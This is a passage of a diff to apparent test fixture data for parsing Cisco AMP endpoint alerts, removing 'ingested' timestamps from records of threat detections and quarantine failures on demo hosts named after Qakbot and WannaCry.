@@ -648,7 +641,6 @@ ], "code": "1090519054", "id": "6412680266518626000", - "ingested": "2022-02-02T05:52:43.212719635Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":478000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}", "severity": 2 
@@ -736,7 +728,6 @@ ], "code": "553648143", "id": "6412680266518626000", - "ingested": "2022-02-02T05:52:43.212720443Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "severity": 2 
@@ -808,7 +799,6 @@ ], "code": "553648143", "id": "6412680266518626000", - "ingested": "2022-02-02T05:52:43.212721253Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "severity": 2 
@@ -884,7 +874,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212722074Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}", "severity": 2 
@@ -960,7 +949,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212723139Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}", "severity": 2 
@@ -1036,7 +1024,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212723974Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -1112,7 +1099,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212724884Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526294\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -1188,7 +1174,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212725692Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526293\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -1264,7 +1249,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212726576Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526292\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -1340,7 +1324,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212727583Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526291\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -1416,7 +1399,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212728534Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526288\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -1492,7 +1474,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212729403Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526287\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -1568,7 +1549,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212730217Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526286\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -1644,7 +1624,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212731029Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558988\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -1720,7 +1699,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212732112Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558989\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -1796,7 +1774,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212732942Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558987\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -1872,7 +1849,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212733859Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558986\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -1948,7 +1924,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212734676Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558985\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -2024,7 +1999,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212735537Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete 